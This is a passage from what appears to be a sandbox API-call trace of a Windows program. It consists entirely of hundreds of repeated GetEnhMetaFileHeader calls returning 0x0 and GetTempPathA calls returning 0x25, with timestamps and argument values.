lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.768] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) 
returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, 
nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 
lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.769] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.882] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | 
out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.883] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.884] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.885] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.886] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.887] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0095.888] GetTempPathA (in: 